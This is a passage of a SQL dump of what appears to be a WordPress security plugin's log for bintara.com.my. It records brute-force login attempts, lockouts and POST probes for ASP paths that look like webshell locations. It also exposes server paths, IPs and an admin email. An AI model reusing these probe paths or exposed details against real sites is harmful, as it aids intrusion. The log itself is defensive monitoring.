Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiS3kXpgmG5P@iB8kv9gAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"182.92.165.143\";s:11:\"REMOTE_PORT\";s:5:\"37392\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiS3kXpgmG5P@iB8kv9gAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071691.3208\";s:12:\"REQUEST_TIME\";s:10:\"1569071691\";}}','notice','2019-09-21 13:14:52','2019-09-21 13:14:51',17798744,19288840,'https://bintara.com.my/test/wp-login.php',1,0,'182.92.165.143'),(25832,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:14:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:14:51\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:29:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:29:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:14:52','2019-09-21 13:14:51',17883656,19288840,'https://bintara.com.my/test/wp-login.php',1,0,'182.92.165.143'),(25833,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:14:52','2019-09-21 13:14:51',18090024,19288840,'https://bintara.com.my/test/wp-login.php',1,0,'182.92.165.143'),(25834,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiZ3kXpgmG5P@iB8kwCgAAAIE\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.15.189.102\";s:11:\"REMOTE_PORT\";s:5:\"58234\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiZ3kXpgmG5P@iB8kwCgAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071720.1161\";s:12:\"REQUEST_TIME\";s:10:\"1569071720\";}}','notice','2019-09-21 13:15:21','2019-09-21 13:15:20',17792696,19283256,'https://bintara.com.my/wp/wp-login.php',1,0,'51.15.189.102'),(25835,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:15:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:15:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:30:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:30:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:15:21','2019-09-21 13:15:20',17877720,19283256,'https://bintara.com.my/wp/wp-login.php',1,0,'51.15.189.102'),(25836,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:15:21','2019-09-21 13:15:20',18083384,19283256,'https://bintara.com.my/wp/wp-login.php',1,0,'51.15.189.102'),(25837,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYib1iJ7D9Gn7wDPh8gdQAAAMw\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.167.101.30\";s:11:\"REMOTE_PORT\";s:5:\"43117\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYib1iJ7D9Gn7wDPh8gdQAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071727.1923\";s:12:\"REQUEST_TIME\";s:10:\"1569071727\";}}','notice','2019-09-21 13:15:28','2019-09-21 13:15:27',17799584,19289840,'https://bintara.com.my/blog/wp-login.php',1,0,'185.167.101.30'),(28955,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//inc/AspCms_AdvJs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"222.223.254.12\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"222.223.254.12\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG27Uq-QPicCh3WFsYfngAAAIk\";s:12:\"REDIRECT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56595\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:10:\"SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG27Uq-QPicCh3WFsYfngAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571927789.779\";s:12:\"REQUEST_TIME\";s:10:\"1571927789\";}}','notice','2019-10-24 14:36:31','2019-10-24 14:36:30',35269632,37080536,'http://bintara.com.my//inc/AspCms_AdvJs.asp',1,0,'222.223.254.12'),(28956,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Adin/Admin_.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"823\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"58.87.88.27\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"58.87.88.27\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Adin/Admin_.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Adin/Admin_.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG29kq-QPicCh3WFsYfqwAAAIE\";s:12:\"REDIRECT_URL\";s:16:\"/Adin/Admin_.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56928\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Adin/Admin_.asp\";s:10:\"SCRIPT_URL\";s:16:\"/Adin/Admin_.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG29kq-QPicCh3WFsYfqwAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927798.5721\";s:12:\"REQUEST_TIME\";s:10:\"1571927798\";}}','notice','2019-10-24 14:36:40','2019-10-24 14:36:38',35341752,37138992,'http://bintara.com.my//Adin/Admin_.asp',1,0,'58.87.88.27'),(28957,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Adin/Admin_.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"688\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"222.39.161.199\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"222.39.161.199\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Adin/Admin_.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Adin/Admin_.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG3Ce0MT698oQwhBK9erwAAAQQ\";s:12:\"REDIRECT_URL\";s:16:\"/Adin/Admin_.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Adin/Admin_.asp\";s:10:\"SCRIPT_URL\";s:16:\"/Adin/Admin_.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG3Ce0MT698oQwhBK9erwAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927817.6671\";s:12:\"REQUEST_TIME\";s:10:\"1571927817\";}}','notice','2019-10-24 14:36:59','2019-10-24 14:36:58',35270384,37069864,'http://bintara.com.my//Adin/Admin_.asp',1,0,'222.39.161.199'),(28958,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//jnh/confings.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"202.74.8.53\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"202.74.8.53\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/jnh/confings.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/jnh/confings.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG3I-5cHc@dX2BdZ47FZgAAABc\";s:12:\"REDIRECT_URL\";s:17:\"/jnh/confings.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57815\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/jnh/confings.asp\";s:10:\"SCRIPT_URL\";s:17:\"/jnh/confings.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG3I-5cHc@dX2BdZ47FZgAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927843.1277\";s:12:\"REQUEST_TIME\";s:10:\"1571927843\";}}','notice','2019-10-24 14:37:24','2019-10-24 14:37:23',35341240,37146240,'http://bintara.com.my//jnh/confings.asp',1,0,'202.74.8.53'),(28959,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//jnh/confings.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"219.150.122.15\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"219.150.122.15\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/jnh/confings.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/jnh/confings.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG3N0q-QPicCh3WFsYgBgAAAIE\";s:12:\"REDIRECT_URL\";s:17:\"/jnh/confings.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"58248\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/jnh/confings.asp\";s:10:\"SCRIPT_URL\";s:17:\"/jnh/confings.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG3N0q-QPicCh3WFsYgBgAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927863.4006\";s:12:\"REQUEST_TIME\";s:10:\"1571927863\";}}','notice','2019-10-24 14:37:45','2019-10-24 14:37:43',35271840,37068560,'http://bintara.com.my//jnh/confings.asp',1,0,'219.150.122.15'),(28960,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/jiuge.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 